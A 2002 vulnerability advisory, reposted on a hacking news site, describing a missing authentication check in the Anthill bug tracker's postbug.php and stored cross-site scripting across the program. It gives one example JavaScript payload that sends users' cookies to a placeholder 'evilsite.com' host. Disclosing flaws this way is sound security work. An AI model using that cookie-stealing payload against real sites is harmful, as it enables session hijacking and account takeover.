Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Anthill login and JavaScript vulnerabilities

Anthill login and JavaScript vulnerabilities

by Nikola Strahija on April 8th, 2002 "Anthill is a bug tracking database system written in PHP. It provides the standard bug tracking features such as: user logins, summary reports, submitting bugs, querying bugs, various severity and status levels. It also provides some unique features, such as a template system, and multi-lingual support." (direct quote from the program's project page at Freshmeat)


Anthill was written because the vendor felt that Bugzilla was too complex.
It is published under the terms of the GNU General Public License. The program
is used by the MandrakeSoft Secteam, among others.


ISSUES:

1) New bugs are entered by accessing the script enterbug.php. It POSTs the
data to the script postbug.php, which stores it in the database. enterbug.php
checks if you're logged in, but postbug.php does not. This means that people
without accounts can enter new bugs in the system, by creating an HTML
document like the ones that enterbug.php displays (the same field names, the
same action attribute) and then simply accessing that HTML document locally.

2) Almost everywhere in the program, HTML code is stored and displayed without
any interference. This makes it easy for one user to add JavaScript code that
will be executed by another user. One of the authentication methods supported
is based on cookies. If that method is used, a malicious user may enter a
short JavaScript snippet like:

self.location.href="http://www.evilsite.com/evil?"+escape(document.
cookie)

to steal other people's cookies with their login information.


COMMUNICATION WITH VENDOR:

The vendor was contacted, first on the 16th of March, and then on the 1st of
April. He realizes that these bugs affect the program's security, but he
doesn't have the time to fix them, since this is just a hobby project that he
doesn't get paid for. (Hmm.. I wonder if Richard Stallman or Linus Torvalds
ever thought that way.)


RECOMMENDATION:

No fixed version is currently available. I recommend that all administrators
use their web servers' authentication/access control facilities in their
Anthill directories to keep strangers away, or that they simply change to
some better program.



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »